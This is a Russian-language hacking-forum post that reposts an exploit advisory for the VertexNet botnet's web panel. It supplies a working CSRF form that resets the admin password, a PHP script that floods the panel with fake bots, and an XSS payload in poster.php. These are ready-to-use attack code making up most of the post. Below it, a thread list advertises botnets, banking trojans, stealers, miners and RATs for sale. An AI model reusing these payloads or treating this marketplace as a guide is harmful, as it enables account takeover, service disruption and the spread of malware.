VertexNet botnet v1.1 multi vulnerability

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
# Date: 3-12-2015
# Exploit Author: alqnas eslam
# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Тестировалось на: windows и linux

1- csrf change password and setting:

save this code in html file and send it to admin
when he open it the setting will be changed
<body onload="document.alqnas.submit()">
<form action="

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

" method="post" name="alqnas">
<input type="text" name="maxusers" value="15" />
<input type="text" name="userswidth" value="400" />
<input type="text" name="showgeo" value="y" />
<input type="text" name="showoff" value="y" />
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="alqnas" />
<input type="submit" />
</form>
</body>


2- bots flood:

you can do flood bots by this code run it with php

<?php
$i =1;
function adduser($url)
{
$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$output=curl_exec($ch);
curl_close($ch);
return $output;
}
//400 are numbers you will send it
while ( $i <=400){
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
//change localhost to url of bot
echo adduser("

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

");
$i++;
}
?>

3- cross site scripting (xss)

in file poster.php prametar uid not fillter from html code
so we can do xss attack

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

"><script>alert(/xss/)</script>
 
Название темы
Автор Заголовок Раздел Ответы Дата
B VertexNet Loader v1.2.1 + Tutorial Spam/DDOS/Malware 0
CinoDev_Lab Ожидает оплаты CINOSHI LAB [$99] вирусология. [Stealer, Botnet, Miner, Clipper] Продажа софта 1
A Xmbot Maza - Android Botnet (Modife Anubis) Продажа софта 0
T CERBERUS V10 ADVANCED BANKING BOTNET Продажа софта 0
DukeEugene Проверено Android botnet ERMAC-2 Продажа софта 4
Clarence Anubis-Banking-Botnet 8.0 Source Code!!! Spam/DDOS/Malware 1
Kalash Интересно APK Botnet набор в команду Предоставляю работу. Ищу специалиста. 0
Whit3_D3vil UBEL ANDROID BANKING BOTNET Продажа софта 2
Kalash Интересно Cerber Botnet Вирусология 8
NickelBlack BOTNET BIBLE V.3 Вирусология 9
NickelBlack LiteHTTP Botnet | Loader | Panel + Builder & Source Code С/C++ 4
NickelBlack BlackNET Botnet v3.5 [Stealer+Keylogger+DDOS] .NET 24
E Android PC Botnet Installs exe,apk Услуги дизайнеров/веб-разработчиков 0
S Cythosia Botnet v2 [Webpanel + Builder] Spam/DDOS/Malware 0
S Athena HTTP Botnet Builder + Panel v1.0.8 Spam/DDOS/Malware 0
S Zeus Botnet 2.1.0.1 Spam/DDOS/Malware 0
S sms botnet Spam/DDOS/Malware 1
S Parasite HTTP Botnet + All Plugins Spam/DDOS/Malware 0
S Loki Bot 2.0 Android Banker Botnet Spam/DDOS/Malware 3
B BlackNET v1.0.0 Advanced MultiOS BotNET + Secure PHP Panel + Tutorial Spam/DDOS/Malware 0
I BotNet-Master (большой комплект исходников) С/C++ 0
T Самописные исходники Botnet'a от 10K Полезные статьи 2
G Android botnet - full инструкция Полезные статьи 3
Traven Android botnet - full инструкция Полезные статьи 1
Traven Android Botnet (Qiwi, SberBank, AlfaBank, Visa, MasterCard) Другое 7
E Zeus Botnet 5.0.0.1 [2017] Уязвимости и взлом 1
АнАлЬнАя ЧуПаКаБрА DiamondFox 4.2.0.650 Обновленный botnet Spam/DDOS/Malware 3
FADER Sell Gold RDP BRUTE [MULTI] Продажа софта 0
P [#1] PURE MINER v3 | BEST SILENT MULTI COIN MINER | BTC RVN DOGE XMR ETH ETC | PROXY Продажа софта 0
kleenscan Kleenscan.com - AV \ Multi AV Scanner Malware, эксплойты, связки, крипт 13
NickelBlack Multi-Downloader v0.1 - Download & Run File From URL Spam/DDOS/Malware 0
S RDP Multi Tool Продажа софта 12
R [CRACKED] Unknown RAT v.1.2.0 Multi-OS Windows Linux Android Mac Spam/DDOS/Malware 1
АнАлЬнАя ЧуПаКаБрА Multi shit tool, Dorks, Proxy Софт для работы с текстом/Другой софт 0

Название темы